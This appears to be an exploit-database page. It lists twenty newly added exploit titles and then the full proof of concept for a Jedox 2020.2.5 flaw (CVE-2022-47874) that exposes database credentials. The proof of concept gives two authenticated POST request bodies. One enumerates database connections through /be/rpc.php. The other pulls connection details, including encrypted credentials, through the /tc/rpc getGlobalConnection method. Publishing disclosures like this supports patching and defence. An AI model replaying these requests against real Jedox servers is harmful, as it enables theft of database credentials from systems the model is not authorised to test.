8945b320b5
20 changes to exploits/shellcodes/ghdb Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution Cmaps v8.0 - SQL injection EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal) File Thingie 2.5.7 - Remote Code Execution (RCE) Intern Record System v1.0 - SQL Injection (Unauthenticated) Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module Jedox 2022.4.2 - Code Execution via RPC Interfaces Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks Jedox 2022.4.2 - Remote Code Execution via Directory Traversal KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE) Online Pizza Ordering System v1.0 - Unauthenticated File Upload pluck v4.7.18 - Stored Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS) Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
56 lines
No EOL
1.4 KiB
Text
56 lines
No EOL
1.4 KiB
Text
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
|
|
# Date: 28/04/2023
|
|
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
|
|
# Vendor Homepage: https://jedox.com
|
|
# Version: Jedox 2020.2 (20.2.5) and older
|
|
# CVE : CVE-2022-47874
|
|
|
|
|
|
Introduction
|
|
=================
|
|
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
|
|
|
|
|
|
Write-Up
|
|
=================
|
|
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
|
|
|
|
|
|
Proof of Concept
|
|
=================
|
|
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
|
|
|
|
PATH: /be/rpc.php
|
|
METHOD: POST
|
|
BODY:
|
|
[
|
|
[
|
|
"conn",
|
|
"ls",
|
|
[
|
|
null,
|
|
false,
|
|
true,
|
|
[
|
|
"type",
|
|
"active",
|
|
"description"
|
|
]
|
|
]
|
|
]
|
|
]
|
|
|
|
2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
|
|
|
|
PATH: /tc/rpc
|
|
METHOD: POST
|
|
BODY:
|
|
[
|
|
[
|
|
"com.jedox.etl.mngr.Connections",
|
|
"getGlobalConnection",
|
|
[
|
|
"<CONNECTION>"
|
|
]
|
|
]
|
|
] |